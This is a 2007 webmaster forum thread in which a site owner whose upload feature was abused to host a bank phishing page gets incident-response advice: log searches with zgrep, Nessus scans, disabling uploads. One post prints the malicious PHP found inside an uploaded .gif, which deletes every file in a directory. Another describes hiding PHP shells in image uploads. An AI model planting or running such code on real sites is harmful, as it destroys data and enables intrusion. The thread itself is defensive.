1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

My site got hacked, used for phishing, please help!

Discussion in 'Security' started by Riccardo, Nov 7, 2007.

  1. #1
    One day I got this from my host:

    My site is using a self programmed admin panel (htaccess and user:password protected) for writing news, charts, lyrics, uploading pics, editing php files directly online....

    People visiting the website were also able to submit news and upload pictures. which then had to be activated by the admin in the admin panel.

    Could this be the issue that someone uploaded those files and directories?
     
    Riccardo, Nov 7, 2007 IP
  2. ndreamer

    ndreamer Guest

    Messages:
    340
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #2
    is this a dedicated box ? we can not really say what was the problem with out looking at the code what you need to do is check your files permission settings and scan your code for any holes if you have any 3rd party software make sure they are all up to date.

    make sure you check your site for any hidden iframes and remove them asap.
     
    ndreamer, Nov 7, 2007 IP
  3. Fash

    Fash Peon

    Messages:
    37
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Go through your access logs and look for strange entries as well as bruteforce attempts (huge list of the same IP trying to access your admin panel over and over again).
     
    Fash, Nov 7, 2007 IP
  4. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #4
    in such warnings based on already existing abuse you normally should have a deadline of a few hours only.

    it is apparent that you have lacking knowledge
    and also gave too little info to help more precisely
    URL !!?

    to get real help you need to give facts of all SW - most efficient is URL to site!

    then:

    1.
    ask politely your host for help
    specially date, time or details of security breach of your site

    2.
    with that data
    you should then start a complete search of all your log files.
    i.e.
    apache error_logs
    access_logs
    /var/log/warn
    /var/log/messages >> search: grep "Invalid user" /var/log/messages
    you see a lot of lines similar to:
    Invalid user a from 62.123.192.212
    Invalid user fluffy from 147.46.69.170
    Invalid user admin from 147.46.69.170
    Invalid user test from 147.46.69.170

    these are hundreds or thousands of usual DAILY hacker attempts we all have on our machines
    make sure NONE of them was successful !!

    also go thru the
    mail logs !!

    visual search near and before date of incident.

    look / search for google referrers !!!
    from a months or several months back

    if you have limited knowledge then chances are you have been hosting cybercriminals many times

    look in ALL previous ( at least one year back ) access_logs for entries of files that do NOT belong to you

    look INTO ( open in editor !! ) all index.php files !!!
    look into access_logs for strings like

    - paypal
    - ebay
    etc ( all the typical phishing mails )

    hackers often leave either files behind OR at least during the actual USEAGE of files you WILL have log entries !!!

    MEANWHILE until you found EXACT root-cause and SOLVED by securing, you seriously and instantly should:

    freeze all login SW
    either by disabling all SW, disable ALL upload of ANY and every kind of file !!

    chmod 000 all folders into admin sections and/or upoload sectiosn
    chmod 000 all interactive areas

    replace password login by server key login AND completely DISABLE sitewide all password login !!

    make a LIST - of all files,
    DOWNload all files for offline verification of FILE content

    hackers / phishers often use COMMON file names already existing in a normal site to change its content into a hacker content - such as for example index.php which often is the hackers admin panel with all functionalities.

    by doing above you may lose traffic - but may be able to save the site
    by being too negligent you may lose your site and your host correctly shuts down all - including YOU. specially since the planet has a rather poor reputation of hosting hackers and questionable sites and activities.

    cybercrime is something as serious like robbing a bank
    hosting cybercrime even if done out of gross negligence is as serious as the hacker-activities itself.
    hence ACT now, until solved, forget weekend and sleep, get coffee and use GOOGLE,
    search for

    security alert ( and add ONE by ONE every single piece of your installed SW ) to see which SW you have did have or does have known security bugs.

    scan your site using NESSUS !! - full scan.
    you get a huge output with lots of details.
    solve every security problem step by step.

    it may take you until near Christmas - it took me many hundred hrs when I was in your situation some 2 yrs ago.
     
    hans, Nov 7, 2007 IP
    NinjaNoodles likes this.
  5. Riccardo

    Riccardo Peon

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Ok, all third party software is up to date!

    Secondly my friend who is managing the server is quite good. I dont have ssh access and will ask them for the logs, but they are so hughe, any command to just grep the logs for specific files or directories?

    I will try Nessus.

    I will also check for paypal and iframe stuff but i doubt there is something.

    Thanks for helping me a bit im so frustrated!
     
    Riccardo, Nov 7, 2007 IP
  6. Riccardo

    Riccardo Peon

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Does Nessus also scna the php files? all files on my website?
     
    Riccardo, Nov 7, 2007 IP
  7. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #7
    paypal is just one possibility of phishing site setup and since names or folders for a pp phishing site often do contain the word paypal - such log entries in OLD log files would be easy to find.
    other phishing site setups include most major banks such as citibank, ebay, amazon, etc anything that has online accounts and online login.

    if u understand the method of how hacker setup phishing site, then you also know how to search for ANY other phishing site or MASS-mailing setup on your site.

    keep in mind that your host HAD a complkait - complaints of that nature always are the result of existign EVIDENCE.
    hence you still HAVE a security hole in YOUR part of the site, NOT in the hosting/server part of the site.

    hosts/servers seldom or never are the risk factor
    the only risk ALWAYS is webmaster and his lack of knowledge to properly configure and secure HIS installed SW.

    for your info
    precise numbers from early year to yestgerday
    i had exactly
    218937 brute force password crack attempts on my server ...
    thats a lot
    and you most likely have similar but never aware because out of YOUR control
    in addition to such sshd attcks there are a comparable number OTHER attempts - for me AND for you.

    you may most safely assume that YOUR site is UN-secured until the very moment when YOUhave actively secured your site in all aspects of SW usage beyond installing scripts.
    installing configuring scripts is the tiny part
    securing all is the real work of a webmaster
    latter part may take many hundreds of hrs study of all aspects of scripts installed by you on your server
    plus an equal period of tme to actually search/fid and secure all parts of your site.

    nessus is one possible powerful way to control and search for known security breaches

    searching ALL your log files - using tools and visually searching is the other method
    unless you have FOUND the entry point and understood the procedure used by hackers and have then fixed that how - your site and your host is compromised and still at risk.

    hackers come in intervals
    a few days active
    then weeks or moths passive to make you belief all is fine
    then another rush on your unsecured site ...
    year after year
    until you fixed all holes OR reduced the scope of www activities to a range that you fully understand and fully secure based on true existing knowledge
    i call that principle "always stay within your own limits" of what you know, understand and are able to fully control AND secure.

    NO need for any frustration
    this is a CHALLENGE to make you a better, more responsible and more secure webmaster!!!
     
    hans, Nov 7, 2007 IP
  8. Riccardo

    Riccardo Peon

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    just a quick reply, itsnt paypal or suich things, its

    boveda.banamex.com.mx/serban/emp/ something, only this was found on server and reported by host

    also, im not good at php or lunix yet, il study this later. at the moment im a stupid model travelling the world andnot having time at all.

    the logs are so hughe, any command to grep only the lines we need, from specific date or file?
     
    Riccardo, Nov 8, 2007 IP
  9. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #9
    fine for you
    paypal may have become much too tough to crack now. as I mentioned below ... etc !

    hence NOW you know what to do hopefully

    having the files uploaded/reported

    1.
    assuming you are a professional and have Linux offline as well, you do

    2.
    CD to directory where you have ALL your past access_log files, then
    in shell

    zgrep "boveda.banamex.com.mx" access_log-2007*.gz >> hacker.txt

    (use ANY and every strong or path found by your host and reported to you by replacing above "boveda.banamex.com.mx" ! )

    FYI - I am sure you already checked WHO the damaged party is - banamex.com.mx is a mexican bank = BANCO NACIONAL DE MEXICO and the mexican bank account holders may be the damaged person as a result of your cooperation to hsot hackers.

    hence a delay in YOUR securing your site may either bring Interpol to you or American law enforcement - depending on where you reside these hours and days.
    bank robbery is a crime in ALL countries of this planet - and what the hackers did is nothing short of a modern way to rob a bank = banamex.com.mx !

    this above zgrep line may need to be adapted to your precise file name for access_log files but may be correct as is in default apache configuration. this a.m. copy/paste bash line does a complete search of ALL your 2007n access log files and writes the output into the text file hacker.txt

    then you see in above hacker.txt file the FIRST dates and the IPs used - with ALL the IP's found you do again a

    zgrep "xxx.yyy.zzz.aaa" access_log-2007*.gz >> hacker_IP_xxx.yyy.zzz.aaa.txt

    replace xxx.yyy.zzz.aaa by a correct IP used by the hackers,
    repeat above IP search for EACH IP

    now after all that

    search for the FIRST IP occurrence
    date + time

    then go with a regular text editor into that uncompressed access_log file of that date
    and SEARCH visually line by line back and forth around those minutes and seconds of the first occurrence of the hackers IP

    what URL on YOUR site did they visit first
    what was the referrer in their first visit
    then you should know the SW with the security bug
    and study thru Google all security alerts or configuration errors that made it possible for hackers to enter your site.

    RE your: "at the moment im a stupid model traveling the world and not having time at all."

    YES in deed you may be stupid to trow away your life. having a web site and having NO time - means YOU don't care about the real and total damage hackers may do WITH your active support and help. gross negligence, omission to secure your site very definitely may be considered by ANY smart court of law as CO-operation with hackers and some hackers may be simple terrorists hence you may be eligible for a visit by any law enforcement agency or home land security - unless you travel very fast into deepest bush and wait for a few decades
    or unless you really have no time and prefer to spend a few years behind bars ...!!??!!!

    if YOU have a site - then YOU also have a legal liability and responsibility to keep your site free from abuse by hackers and terrorists!
    if you really have no time then it would be your legal responsibility to ask your host TO SHUT DOWN your entire site! until you find time to do what you are responsible to do - your civil duties and responsibilities as a site owner and caring citizen of this planet's human society!

    think twice if you HAVE time on your own
    or
    if you want law enforcement authorities to GIVE / make you time ... it's your life and your FREEDOM at stake as well in addition to the wellbeing of any number of possibly damaged mexican bank account holders
     
    hans, Nov 8, 2007 IP
  10. Riccardo

    Riccardo Peon

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #10
    Thanks mate. I did shut down the site until I solve this issue, Modelling I started because I had personal Problems I might was running away from and try to sort my life and thoughts while doing a bit more travelling. I dont see it as important.

    I know its my task and reliability and thats why the website is down! I respect, understand and know what u r talking about. And yes, I already paid upfront 1 year uni in Sydney to Study IT :)

    I'm not that stupid :)

    Thanks for all the info and wil let u know as soon as I have results.

    You are very helpful I must say. Thanks
     
    Riccardo, Nov 8, 2007 IP
  11. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #11
    good luck in your study and life

    God bless
     
    hans, Nov 8, 2007 IP
  12. toby

    toby Notable Member

    Messages:
    6,919
    Likes Received:
    269
    Best Answers:
    0
    Trophy Points:
    225
    #12
    i got similar problem before. What happened was that the hacker knows my password to my box. so he just log on as me and upload the phised site.

    so make sure you change your whole password including your email account. REMEMBER to reformated your pc or scan for virus.

    In my case, i think the guys know my email account and hence know everything from there. So now, I reformat the pc just incase.
     
    toby, Nov 8, 2007 IP
  13. sp360

    sp360 Active Member

    Messages:
    1,022
    Likes Received:
    19
    Best Answers:
    0
    Trophy Points:
    90
    #13
    What some hackers do, is they put a Shell(its a PHP script that acts like a FTP manager, DB manager etc.) code in a .GIF file and then upload it to your server, and then they locate it and use those commands of theres and they get root access. Maybe you should take that function out.
     
    sp360, Nov 8, 2007 IP
  14. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #14
    youi must be kidding using still password to access your box
    that was last millennium we did such - but these years we use serverkey controlled access and SSH !!

    how many password crack attempts did / do you have per year on your box ?? I had this year so far almost a quarter Million !! see my most recent blog article on site security

    sp360

    that upload thing - that's the karma of/for all those who want others to fill their box and create all the content that brings the traffic and adsense-$ .. !

    in my above security blog-article I have a full example fo how hackers attempt to abuse sites who allow uploads - to upload hacker stuff like the shell you mentioned or virus infected files in almost any format.

    preventive measure is to always and only create all your content yourself and thus to have no upload permission for anyone else but you - and then via ssh/sk.

    better have a smaller site but safe/secure and fun, then to have an oversized and out of control site that rocks you into copyright infringement and hackers hell.

    look at all those giants like blogger, blogspot, myspace, hi5, spaces.live, and the many picture "sharing" sites and forums, many grow so huge that they most likely need an attorney on 24/7 just to keep out of lawsuits due to all the illegal stuff going on on their sites. all the a.m. directly named blot/social sites are copyright infringers by the thousands each year - multiplied by thousands of other damaged creators of stolen / illegally uploaded to OTHER servers material - a truly dynamic and up-to-date attorney could start a huge class actions lawsuit in a federal law to once and forever stop such huge server abuse on inadequately controlled and poorly managed sites / servers. the damage done to owners of stolen material and damage created by hacked sites may go into a 2-3 digit Billion $/yr range easily.

    a reason more to stay clean and keen site and nights and off-hours so quiet and relaxing that you actually can enjoy life without having to fear some law enforcement knocking at your door for hosting hackers or cyber criminals ...
     
    hans, Nov 9, 2007 IP
  15. Riccardo

    Riccardo Peon

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    Thanks guys for all the info, i hope my mate is sending me the logs soon. I removed the upload function already and will change all passwords! Thanks

    But wouldn't the htpasswd thing protect my admin panel anyway? or is that easy to crack?
     
    Riccardo, Nov 10, 2007 IP
  16. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #16
    htpasswd has quiet little to NOTHING to do with th eway hackers crack your site
    if you look at some of the most recent security posts i have the last few days in my blog ( sig link ) then you find precise real life samples how hackers do things and non of these real life hack sceneries has anything to do with password at all but with script - securing and ( by hackers and the world ) KNOWN security vulnerabilities of popular scripts. most of these (bugs) are known but never the fixes applied because the site owners have far too little or NO understanding of all site/security relevant stuff.
    in most hacker cases such as yours and the last 10 or so i looked at during the past few days it always was a beginner-site, an easy MFA or so site where no considerable time has been invested to secure ALL scripts on system or on web space of a site.
    many are "just business" sites of ppl who just want to make money and have no time for such and belief that their host is doing their work for the 5-10 $ vhost fee / month ...

    site monitoring and securing PER months may easily take up to many DOZEN extra hours for a single site PER month.

    site securing starts with actually STUDY of installed scripts, what they do - how they do what they do, what additional members suddenly are allowed to do ...
    if MEMBERS can upload stuff, then most likely also hackers - just a matter of hacker's own creativity and experience.

    typical hackers are actually GOOD for you, because they invest as much time and efforts to hack your and other's site as site OWNER/operator SHOULD invest in running a site safely for all society.

    to operate securely / safely a site always is BEST done if you have instant and continuous 24/7/365 access to ALL logs LIVE - i.e. NOT the compressed ones after they are full, but the running ones,
    like all logs for
    - mysql
    - mail
    - warn
    - messages
    - apache erros
    - apache access
    etc
    for monitoring and finding the NEW was attempted by hackers in real time.
    old logs are for site forensic use only - like in your case.

    nessus will show you existing vulnerabilities as well as solutions to it by scanning all possible / existing scripts known to nessus for preventive security
    that again has nothing to do with the htpasswd stuff
    the htpasswd is just ONE out of ten thousands of possibilities to crack/hack a site.
     
    hans, Nov 11, 2007 IP
    cormac likes this.
  17. Riccardo

    Riccardo Peon

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #17
    I think i found it, i found a .gif file that was uploaded and contained

    <? 
    echo "Ïðåâåä, Ðèêêàðäåã!"; 
    
    $dh = opendir("../../links"); 
    while ($filename = readdir($dh)) 
    { 
    echo $filename."<br>"; 
    unlink ("../../links/$filename"); 
    } 
    ?>
    Code (markup):
    How can u prevent this from happening other than disabling the ability to upload gif files?

    The date was Jan 17th so I need to wait stil till my mate sends me the logs. What would be the command to grep all log entries from that date?
     
    Riccardo, Nov 12, 2007 IP
  18. doctorjones

    doctorjones Active Member

    Messages:
    418
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    58
    #18
    always check your login time and login ip address. and always backup your files
     
    doctorjones, Nov 12, 2007 IP
  19. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #19
    to prevent
    avoid ANY and every upload !!
    or
    prevent execution of PHP - that is only possible if you are in a perl or HTML folder of your site.
    check passwords of any users - ban / delete users with insecure passwords !! NO warning else they may re-sing up with different name. use users/members with true names only and a few other general security measures.
    OTHERS here may have more help - i prefer strictly to stay within MY limits, hence on MY server ONE person only uploads - ME.

    to search when you got all your log files - search back in time - there might be OTHER hacker-visits by OTHER hackers as well long before that date or by same hackers but OTHER files.

    you may want to search the hackers IP back up to a year or more.

    a few steps you do - now it may be zgrep since old access_log files are all compressed. all else equal.

    1.
    zgrep "your_gif_file-name.gif access_log-2007*.gz >>hacker_access.txt

    access_log-2007*.gz >>> that would be the exact apache2 format including date - in this search with wild card you search zgrep all log files starting first log file 2007 until last file. you also may go back to 2006. adapt precise file name to your precise log naming.

    that gives you as output written into the file hacker_"access.txt" all log lines that included the use of above found gif file.
    the oldest use is the most accurate to find the actual weak point in your system - the precise door or upload facility that causes your risk.

    of course by above zgrep you also find what IP or IPs hackers used when accessing that file.

    then you do another zgrep using the IP(s) related to the use of a.m. gif file - because hackers may have done much more than just use the file.

    do a

    zgrep "xxx.yyy.zzz.abc" access_log-2007-*.gz >>IP_list_hackers.txt

    replace xxx.yyy.zzz.abc b yth eactual IP
    if you have several IPs related to the use of above gif file, then repeat above procedure but wirte into a seperate file for each IP to have a better overview.

    then write down exact times - start to end of each "visit"
    then search thru other log files

    apache error_log
    plus
    /var/log/warn
    /var/log/messages
    and others ( mysql, mail, etc )
    normally you have NO access to these additional logs - unless you are lucky like me and run a root server as your bride - bride because you spend your nights as much as your days with a root server !!!

    if NOW you have a friend on your hosting, you may get the a.m. additional logs if you explain why - and research exact seconds / minutes during visits to see what else they do/did.

    you may find surprises, hence better secure yourself in a chair with belt .... to avoid fainting or falling in coma.

    you may also ask your server-host to run a rootkit check to see if they are infected in their system as a result of your guests.

    you may find anything from more phishing sites, to chat bots, to mass mailing systems - most or all of these files may be deleted on your HDD but leave traces in your logs to be found with related IPs ...

    study this case exactly and in all aspects from all sides - it may become a most valuable real life learning scenario and it may result either in your decision to reduce the potential of your online activities to regain freedom to sleep and have leisure time - or to shut down entire sections of your site
    or to change your job
    or to become a security expert
    ...
    it may take you time - up to hundreds of hours for above, you will most likely do much just using your own senses, skipping thru all the grep found lines - but you have a unique situation to really learn and appreciate security for the future.
     
    hans, Nov 13, 2007 IP
  20. lslars31

    lslars31 Peon

    Messages:
    260
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #20
    Oh wow, I thought .htaccess was pretty solid. Unless you had a weak password or something, who knows. I suggest you check out http://thefirewallscript.com though. Seems like a pretty solid script.
     
    lslars31, May 23, 2008 IP